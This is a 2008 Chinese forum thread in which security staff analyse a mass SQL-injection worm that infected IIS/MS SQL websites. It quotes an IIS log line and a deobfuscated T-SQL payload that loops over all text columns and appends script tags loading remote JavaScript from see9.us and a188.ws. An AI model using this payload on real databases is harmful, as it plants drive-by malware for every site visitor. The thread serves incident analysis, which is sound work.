引用:

引用某人发布的案例
五一假期回来，突然发现我的两个网站（一个是ASP.NET 1.1，一个是ASP.NET 2.0）的数据库（一个是MS SQL 2000，一个是 MS SQL 2005）某些表的某些文本字段所有数据记录都被截掉剩留几个文字，并被附加上了如下略有变化的文本字符：
"> </title> <script src=http://s.see9.us/s.js> </script> <!--
"> </title> <script""> </title> <script src=http://s.see9.us/s.js> </script> <!--
"> </title> <script s"> </title> <script src=http://s.see9.us/s.js> </script> <!--
"> </title> <script src=ht"> </title> <script src=http://s.see9.us/s.js> </script> <!--
"> </title> <sc"> </title> <script src=http://s.see9.us/s.js> </script> <!--
"> </title> <script src=http://s"> </title> <script src=http://s.see9.us/s.js> </script> <!--

最后一行是空白数据的时候，插入的字符就会重复一些，显得特别长。

无论我通过update方法清空多少次，如果我不停止IIS里的站点，很快就会重新大量出现，不像是人工所为，应该是服务器中了什么木马病毒之类的，不知有没有什么杀毒软件可以查杀这些病毒的？
我浏览了下论坛里的ASP.NET板块和MS SQL数据库板块的帖子，发现有相当部分反应这个问题的帖子，几乎都是五一期间发生的，但都没发现有一个彻底有效的解决方法的。

引用:

发件人： leander jiang
发送时间： 2008-05-15  00:57:17

主题： 大家都看看//Re: 关于XXXXX局的应急

From:2008/5/14 <jia_zhaokun@topsec>:

   检查过主机进程\端口\注册表\日志等内容,没发现什么明显的异常,和客户商量准备写报告,以为XXXX局的事情大概会了结了.晚上回家继续在网上搜搜.发现五一以来有不少这样的案例,一般都难以发现原因,而且会不断出现.目前客户正在恢复网站,我担心很可能很快再现.
   暂时还没找到确实有效的解决办法,有人说可能是iis0day在流传，目前可找到的资料很少，这是在网上找到的类似案例。http://topic.csdn.net/u/20080510 ... f847.html?999737774

--------------------------------------------------------------------------------

发件人： 古道
发送时间： 2008-05-15 06:40:50
主题： Re: 大家都看看//Re: 关于国家统计局的应急

1、从目前收集到的信息来看，攻击方式以利用样式表挂马，配合一些本地溢出0day对浏览网站的客户端进行攻击
2、从传播病毒网站的症状来看，属于自动化传播行为，是一种新的蠕虫类型，我认为应该叫做SQL注入+XSS跨站+0day蠕虫，嘿嘿
3、绝大多数被感染网站都是IIS平台
4、病毒有0day溢出，最好挂虚拟机去尝试，小叶的电脑昨晚已经很勇敢的中弹了
5、从收集信息来开，大多数人的解决办法都是解决网站的注入问题来解决这个问题

[ 本帖最后由 古道 于 2008-5-15 06:56 编辑 ]

SQL注入+XSS跨站+0day蠕虫,很强大的攻击方式:lol

引用:

发件人: song_yn@topsec
发送时间: 2008年5月15日 20:12
主题: 答复: Re: 大家都看看//Re: 关于XXXX局的应急

找到的相关资料供大家参考：
http://isc.sans.org/diary.html?storyid=4393&rss
http://www.f-secure.com/weblog/archives/00001432.html
   http://cyberinsecure.com/another-sql-injection-worm-making-rounds-with-4000-websites-infected/
这个事情在国外的一些资料中显示是国内流行起来的 涉及的域名是国内注册的，cncert也已开始处理了一些域名。此事件个人认为需我们注意，因为最近我们的许多北京项目都涉及web网站 且基本上全是iis的平台。

呵呵，今天在机场的时候又分析了一下sunki提供的病毒文件，有了一些进一步的结论：
1、病毒利用了realplay本地漏洞对客户端进行攻击，并且对代码进行了很复杂的免杀处理，杀毒软件无法检测到
2、病毒调用了广告模块，它的用途之一是被用来刷广告链接来获取经济利益

其实目前病毒在客户端的传播机制是明确的，就是利用一些本地0day(这次是realplay,可能还有ms漏洞,迅雷漏洞，等等...)，黑客可以根据需要随时调换这些0day来获取最大效果。
但是病毒在服务器是怎么感染上的？这个还不是很明确，也没有一个很一定准确的说法。网上确实有一些是通过注入来感染的，但是它又是怎么自我恢复的呢？而且只有注入一个途径么？会有IIS0day么？
如果再有案例的话，我们可以仔细研究一下。：P

呵呵，同事去客户处再次检查了IIS日志，总算把尾巴揪了出来

引用:

2008-05-13 21:04:37 W3SVC1 10.1.1.3 GET /elist.aspx page=2&pid=;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 221.130.187.233 Mozilla/4.0 500 0 64

引用:

整理以后的
dEcLaRe @t vArChAr(255),@c vArChAr(255)
dEcLaRe tAbLe_cursoR cUrSoR FoR
exec(‘UpDaTe [’+@t+‘sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD

AnD a.xTyPe=‘u’ AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167)
oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0)
bEgIn
exec(‘UpDaTe [’+@t+‘] sEt [’+@c+‘]=rtrim(convert(varchar,[’+@c+‘]))+cAsT

(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3

C2F7363726970743E3C212D2D aS vArChAr(67))’)
fEtCh next FrOm tAbLe_cursoR iNtO @t,@c
eNd
cLoSe tAbLe_cursoR
dEAlLoCaTe tAbLe_cursoR

其中这一段16进制代码
0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3
转换为字符串为"></title><script src=http://s.see9.us/s.js></script><!--

传一个进制转换工具，可以用来分析进行编码转换的字符 (杀毒软件可能会报警，请想好是否使用：P)

[ 本帖最后由 古道 于 2008-6-30 19:11 编辑 ]

跟一个赚个金币，好下载工具看看.
cast()是sql的类型转换工具，cAsT
(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67))，就是强制把0x后面的16进制转到67字节长的类型。
0x后面的16进制是ascii，可以转成字符串。
我的转换工具附带了一个winhook.dll，很让人不放心，看看turn5.rar 了。

可怜，RMB还是不够。

上午没事分析了一下sql操作语句。
dEcLaRe @t vArChAr(255),@c vArChAr(255)
dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167)
oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c
while(@@fEtCh_status=0)
bEgIn
        exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(varchar,['+@c+']))+'</title>"><script src=http://a188.ws/1.js></script><!--'')
        fEtCh next FrOm tAbLe_cursoR iNtO @t,@c
eNd
cLoSe tAbLe_cursoR
dEAlLoCaTe tAbLe_cursoR;
其中b.xTyPe=99是ntext类型，b.xTyPe=35是text类型，b.xTyPe=231是nvarchar类型，b.xTyPe=167是varchar类型，a.xTyPe='u'表示用户表，@t里面放的是用户表名，@c里面放的是用户表中上述4各类型字段值。
联起来，大意是选择所有用户表中所有类型是ntext，text，nvarchar，varchar字段，更新用户表的指定字段值，在原字段值后面子增加“'</title>"><script src=http://a188.ws/1.js></script><!--'”

[ 本帖最后由 jacky_jia 于 2008-5-17 11:11 编辑 ]

I want the tools. publish this notes :-)

抱歉，工具因为论坛配置的关系大家无法下载～
如果有需要的，请留mail